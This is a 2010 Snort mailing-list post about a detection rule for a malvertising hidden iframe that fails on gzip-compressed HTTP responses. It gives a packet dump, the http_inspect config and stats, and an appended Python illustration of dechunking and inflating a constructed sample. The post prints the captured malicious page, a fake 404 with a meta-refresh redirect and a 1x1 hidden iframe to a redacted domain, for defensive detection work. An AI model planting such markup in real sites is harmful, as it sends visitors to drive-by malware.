Snort mailing list archives
http_inspect - no gzip decompressed data processed?
From: Eoin Miller <eoin.miller () trojanedbinaries com>
Date: Thu, 15 Jul 2010 20:26:46 +0000
I have a small pcap I am trying to write sigs for. After figuring out that I didn't have gzip enabled (because I used the snort.conf that came with Snort rather than the snort.conf that came with the VRT ruleset, doh!), I am still unable to get any of the sigs to fire on it.
Signature (dumbed down just for testing purposes here; if I make the signature only require matches on anything that is not GZIP'd, then it will fire):

alert tcp any any -> any any (msg:"MALVERTISING hidden iframe served by ngix 2"; content:"iframe"; nocase; classtype:bad-unknown; sid:5600066; rev:1;)
Raw packet that should be causing the sig to fire (removed address/ports stuff). This is the only packet in the stream that has gzip encoded data:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
07/12-18:07:10.511891 XXX.XXX.XXX.XXX:80 -> XXX.XXX.XXX.XXX:2790
TCP TTL:51 TOS:0x0 ID:2145 IpLen:20 DgmLen:575 DF
***AP*** Seq: 0x126BD99B  Ack: 0x61DCA8DD  Win: 0x1A28  TcpLen: 20
0x0000:
0x0010:
0x0020:
0x0030: 54 54 50 2F 31 2E 31 20 32  HTTP/1.1 2
0x0040: 30 30 20 4F 4B 0D 0A 53 65 72 76 65 72 3A 20 6E  00 OK..Server: n
0x0050: 67 69 6E 78 2F 30 2E 36 2E 33 39 0D 0A 44 61 74  ginx/0.6.39..Dat
0x0060: 65 3A 20 4D 6F 6E 2C 20 31 32 20 4A 75 6C 20 32  e: Mon, 12 Jul 2
0x0070: 30 31 30 20 31 38 3A 30 37 3A 31 30 20 47 4D 54  010 18:07:10 GMT
0x0080: 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20  ..Content-Type:
0x0090: 74 65 78 74 2F 68 74 6D 6C 0D 0A 54 72 61 6E 73  text/html..Trans
0x00A0: 66 65 72 2D 45 6E 63 6F 64 69 6E 67 3A 20 63 68  fer-Encoding: ch
0x00B0: 75 6E 6B 65 64 0D 0A 43 6F 6E 6E 65 63 74 69 6F  unked..Connectio
0x00C0: 6E 3A 20 6B 65 65 70 2D 61 6C 69 76 65 0D 0A 58  n: keep-alive..X
0x00D0: 2D 50 6F 77 65 72 65 64 2D 42 79 3A 20 50 48 50  -Powered-By: PHP
0x00E0: 2F 35 2E 31 2E 36 0D 0A 43 6F 6E 74 65 6E 74 2D  /5.1.6..Content-
0x00F0: 45 6E 63 6F 64 69 6E 67 3A 20 67 7A 69 70 0D 0A  Encoding: gzip..
0x0100: 0D 0A 61 0D 0A 1F 8B 08 00 00 00 00 00 00 03 0D  ..a.............
0x0110: 0A 31 33 30 0D 0A BD 52 CB 4E C4 30 0C BC EF 57  .130...R.N.0...W
0x0120: 44 B9 04 24 DA 74 D9 07 85 4D 7A 44 82 03 1C E0  D..$.t...MzD....
0x0130: 07 D2 D6 6D 22 D2 64 37 75 F7 F1 F7 A4 DD 15 42  ...m".d7u......B
0x0140: 20 AE F8 64 8F 3D 1E 6B 64 A1 B1 B3 85 D0 A0 EA   ..d.=.kd.......
0x0150: 62 26 3A 40 45 34 E2 36 81 DD 60 F6 92 56 DE 21  b&:@E4.6..`..V.!
0x0160: 38 4C F0 B4 05 4A 2E 95 A4 08 47 E4 23 73 43 2A  8L...J....G.#sC*
0x0170: AD 42 0F 28 9F DE 5E 93 3C 5F DD 27 73 1A 17 A1  .B.(..^.<_.'s...
0x0180: 41 0B C5 32 5B 92 17 8F E4 D1 0F AE 16 FC 0C 0A  A..2[...........
0x0190: 3E 89 89 D2 D7 27 52 B6 95 B7 3E 48 7A D0 06 61  >....'R...>Hz..a
0x01A0: 64 56 51 0E 42 BC 68 FE 93 1E 11 C1 2F ED 99 D0  dVQ.B.h...../...
0x01B0: 71 E6 52 B8 D6 B8 23 CF D2 75 BA 58 7D 9B E0 A3  q.R...#..u.X}...
0x01C0: 42 31 FB FF F8 65 23 0B D0 04 E8 35 FB 72 90 DD  B1...e#....5.r..
0x01D0: 6D 86 60 E5 68 F5 03 E7 25 58 6B 2A DF C3 47 9E  m.`.h...%Xk*..G.
0x01E0: 1A D7 78 BE CB 7B CE 0A D1 57 C1 6C 91 58 E5 DA  ..x..{...W.l.X..
0x01F0: 41 B5 20 E9 B3 DA AB B7 09 A4 05 E9 C1 36 69 E7  A. ..........6i.
0x0200: F7 F0 EE AF 16 D9 72 7D B3 C8 56 EB EB 0D 11 FC  ......r}..V.....
0x0210: CC 8B 66 9A 26 A8 0E 48 1F 2A C9 FE D2 72 B7 96  ..f.&..H.*...r..
0x0220: 33 72 30 35 6A C9 E6 8C 68 30 AD C6 29 9D D8 A5  3r05j...h0..)...
0x0230: 0F 35 04 C9 B2 78 10 3F 2F 8C C9 F4 36 9F 04 6B  .5...x.?/...6..k
0x0240: BF 18 3D 02 00 00 0D 0A 30 0D 0A 0D 0A           ..=.....0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Decoded HTML response output:

HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 573
Content-Type: text/html
Date: Mon, 12 Jul 2010 18:07:10 GMT
Server: nginx/0.6.39
X-Powered-By: PHP/5.1.6

<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<title>404 Not Found</title></head><body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.6.35</center>
</body>
<meta http-equiv='refresh' content='7;url=http://<REMOVED>.info/q8s/'><script language="JavaScript">
self.moveTo(3046,3056);
</script>
<iframe src='http://<REMOVED>.info/n2l/' width='1' height='1' frameborder='0'></iframe></html>
The output from http_inspect seems weird as it claims 0 bytes for "Gzip Decompressed Data Processed"?
===============================================================================
HTTP Inspect - encodings (Note: stream-reassembled packets included):
POST methods: 0
GET methods: 2
HTTP Request Headers extracted: 2
HTTP Request Cookies extracted: 0
Post parameters extracted: 0
HTTP response Headers extracted: 2
HTTP Response Cookies extracted: 0
Unicode: 0
Double unicode: 0
Non-ASCII representable: 0
Base 36: 0
Directory traversals: 0
Extra slashes ("//"): 0
Self-referencing paths ("./"): 0
HTTP Response Gzip packets extracted: 2
Gzip Compressed Data Processed: 331.00
Gzip Decompressed Data Processed: 0.00
Total packets processed: 4
===============================================================================

http_inspect config from snort.conf:

===============================================================================
preprocessor http_inspect: global iis_unicode_map unicode.map 1252 compress_depth 20480 decompress_depth 20480

preprocessor http_inspect_server: server default \
    chunk_length 500000 \
    server_flow_depth 0 \
    client_flow_depth 0 \
    post_depth 65495 \
    oversize_dir_length 500 \
    max_header_length 750 \
    max_headers 100 \
    ports { 80 1220 2301 3128 7777 7779 8000 8008 8028 8080 8180 8888 9999 } \
    non_rfc_char { 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 } \
    enable_cookie \
    extended_response_inspection \
    inspect_gzip \
    apache_whitespace no \
    ascii no \
    bare_byte no \
    directory no \
    double_decode no \
    iis_backslash no \
    iis_delimiter no \
    iis_unicode no \
    multi_slash no \
    non_strict \
    u_encode yes \
    webroot no
===============================================================================

Version info:

===============================================================================
# snort --version

   ,,_     -*> Snort! <*-
  o"  )~   Version 2.8.6 IPv6 GRE (Build 38)
   ''''    By Martin Roesch & The Snort Team: http://www.snort.org/snort/snort-team
           Copyright (C) 1998-2010 Sourcefire, Inc., et al.
           Using PCRE version: 7.4 2007-09-21
           Using ZLIB version: 1.2.3.3
===============================================================================

I am seriously tearing my hair out; does anyone have any ideas/suggestions? I have been reading and re-reading README.http_inspect, but I am not seeing why this would not be working with the default configuration.
-- Eoin
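As an added example (not code from the post, Snort, or http_inspect), the following Python builds a constructed response laid out like the packet above, with the gzip stream split across two chunks so that the 10-byte gzip header sits in its own chunk, and then does what a gzip-aware inspector has to do before a content match can hit: dechunk the body, inflate it, and only then look for "iframe" (case-insensitively, as the rule's nocase does). All sample bytes, the example.invalid hostname and the function names are constructed for this illustration.

```python
import gzip
import zlib

# Constructed sample (not the poster's packet): a 404 page carrying the hidden 1x1 iframe.
SAMPLE_HTML = (
    b"<html><head><title>404 Not Found</title></head><body bgcolor='white'>"
    b"<center><h1>404 Not Found</h1></center><hr><center>nginx/0.6.35</center>"
    b"<iframe src='http://example.invalid/n2l/' width='1' height='1'></iframe></body></html>"
)

def build_sample_response(html: bytes) -> bytes:
    # Chunked + gzip, with the 10-byte gzip header in its own chunk: the same split
    # as the post's packet (chunk 'a' holds the header, chunk '130' holds the rest).
    gz = gzip.compress(html, mtime=0)
    chunks = [gz[:10], gz[10:]]
    body = b"".join(b"%x\r\n%s\r\n" % (len(c), c) for c in chunks) + b"0\r\n\r\n"
    return (b"HTTP/1.1 200 OK\r\nServer: nginx/0.6.39\r\nContent-Type: text/html\r\n"
            b"Transfer-Encoding: chunked\r\nContent-Encoding: gzip\r\n\r\n" + body)

def split_response(raw: bytes):
    # Returns (lower-cased header dict, raw body bytes).
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip().lower()
    return headers, body

def dechunk(body: bytes) -> bytes:
    # Reassemble a Transfer-Encoding: chunked body; chunk size lines are hex.
    out, pos = bytearray(), 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # ignore chunk extensions
        if size == 0:
            return bytes(out)
        out += body[eol + 2:eol + 2 + size]
        pos = eol + 2 + size + 2  # step over the data and its trailing CRLF

def inspect(raw: bytes) -> dict:
    # Dechunk first, then inflate the reassembled stream; the two counters
    # mirror http_inspect's "Gzip Compressed/Decompressed Data Processed".
    headers, body = split_response(raw)
    if b"chunked" in headers.get(b"transfer-encoding", b""):
        body = dechunk(body)
    compressed = len(body)
    if headers.get(b"content-encoding") == b"gzip":
        body = zlib.decompress(body, 16 + zlib.MAX_WBITS)  # 16 = expect a gzip wrapper
    return {"compressed": compressed, "decompressed": len(body), "body": body}

def rule_matches(data: bytes, content: bytes) -> bool:
    # The rule's content:"iframe"; nocase; test, applied to one buffer.
    return content.lower() in data.lower()
```

Running inspect() on the sample gives a non-zero decompressed count and a body in which rule_matches() finds "iframe", while the same check on the still-compressed chunk data does not match, which is the difference between the stats the post shows and what a working decode should report.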